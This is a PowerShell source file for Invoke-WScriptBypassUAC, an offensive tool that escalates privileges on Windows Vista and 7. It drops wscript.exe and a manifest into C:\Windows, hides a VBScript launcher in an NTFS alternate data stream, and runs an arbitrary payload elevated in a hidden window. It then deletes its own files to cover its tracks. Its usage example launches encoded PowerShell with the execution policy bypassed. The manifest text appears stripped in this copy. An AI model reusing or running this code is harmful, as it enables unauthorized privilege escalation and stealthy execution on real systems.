function Invoke-WScriptBypassUAC { <# .SYNOPSIS Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. Author: @enigma0x3, @harmj0y, Vozzie License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute VBScript using the wscript executable with the new manifest. The VBScript executed by C:\Windows\wscript.exe will run elevated. .PARAMETER payload The code you want wscript.exe to run elevated. Put the full command in quotes. .EXAMPLE Invoke-WScriptBypass -payload "powershell.exe -ep Bypass -WindowStyle Hidden -enc " .LINK #> [CmdletBinding()] Param( [Parameter(Mandatory=$True)] [string] $payload ) function Local:Get-TempFileName { #Generate Temporary File Name $sTempFolder = $env:Temp $sTempFolder = $sTempFolder + "\" $sTempFileName = [System.IO.Path]::GetRandomFileName() + ".tmp" $sTempFileName = $sTempFileName -split '\.',([regex]::matches($sTempFileName,"\.").count) -join '' $sTempFileNameFinal = $sTempFolder + $sTempFileName return $sTempFileNameFinal } function Local:Invoke-CopyFile($sSource, $sTarget) { # Cab wscript, send to temp and then extract it from temp to $env:WINDIR $sTempFile = Get-TempFileName Start-Process -WindowStyle Hidden -FilePath "$($env:WINDIR)\System32\makecab.exe" -ArgumentList "$sSource $sTempFile" $null = wusa "$sTempFile" /extract:"$sTarget" /quiet # sleep for 2 seconds to allow for extraction to finish Start-Sleep -s 2 # remove the temp files Remove-Item $sTempFile } function Local:Invoke-WscriptTrigger { $VBSfileName = [System.IO.Path]::GetRandomFileName() + ".vbs" $ADSFile = $VBSFileName -split '\.',([regex]::matches($VBSFileName,"\.").count) -join '' $VBSPayload = "Dim objShell:" $VBSPayload += "Dim oFso:" $VBSPayload += "Set oFso = CreateObject(""Scripting.FileSystemObject""):" $VBSPayload += "Set objShell = WScript.CreateObject(""WScript.Shell""):" $VBSPayload += "command = ""$payload"":" $VBSPayload += "objShell.Run command, 0:" # stupid command to kick off a background cmd process to delete the wscript and manifest $DelCommand = "$($env:WINDIR)\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del $($env:WINDIR)\wscript.exe&&del $($env:WINDIR)\wscript.exe.manifest""""""""" $VBSPayload += "command = ""$DelCommand"":" $VBSPayload += "objShell.Run command, 0:" $VBSPayload += "Set objShell = Nothing" $CreateWrapperADS = {cmd /C "echo $VBSPayload > ""$env:USERPROFILE\AppData:$ADSFile"""} Invoke-Command -ScriptBlock $CreateWrapperADS $ExecuteScript = {cmd /C "$($env:WINDIR)\wscript.exe ""$env:USERPROFILE\AppData:$ADSFile"""} Invoke-Command -ScriptBlock $ExecuteScript Remove-ADS $env:USERPROFILE\AppData:$ADSFile } function Local:Invoke-WscriptElevate { $WscriptManifest = @" true true "@ # Copy and apply manifest to wscript.exe $sManifest = $env:Temp + "\wscript.exe.manifest" $WscriptManifest | Out-File $sManifest -Encoding UTF8 Invoke-CopyFile $sManifest $env:WINDIR $WScriptPath = "$($env:WINDIR)\System32\wscript.exe" Invoke-CopyFile $WScriptPath $env:WINDIR Remove-Item -Force $sManifest # execute the payload Invoke-WscriptTrigger } function Local:Remove-ADS { <# .SYNOPSIS Removes an alterate data stream from a specified location. P/Invoke code adapted from PowerSploit's Mayhem.psm1 module. Author: @harmj0y, @mattifestation License: BSD 3-Clause .LINK #> [CmdletBinding()] Param( [Parameter(Mandatory=$True)] [string]$ADSPath ) #region define P/Invoke types dynamically # stolen from PowerSploit $DynAssembly = New-Object System.Reflection.AssemblyName('Win32') $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) $TypeBuilder = $ModuleBuilder.DefineType('Win32.Kernel32', 'Public, Class') $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError') $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('kernel32.dll'), [Reflection.FieldInfo[]]@($SetLastError), @($True)) # Define [Win32.Kernel32]::DeleteFile $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('DeleteFile', 'kernel32.dll', ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Bool], [Type[]]@([String]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Ansi) $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute) $Kernel32 = $TypeBuilder.CreateType() $Result = $Kernel32::DeleteFile($ADSPath) if ($Result){ Write-Verbose "Alternate Data Stream at $ADSPath successfully removed." } else{ Write-Verbose "Alternate Data Stream at $ADSPath removal failure!" } } #make sure we are running on vulnerable windows version (vista,7) $OSVersion = [Environment]::OSVersion.Version if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))){ if(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $True){ "[!] WARNING: You are already elevated!" } else { Invoke-WscriptElevate } }else{"[!] WARNING: Target Not Vulnerable"} }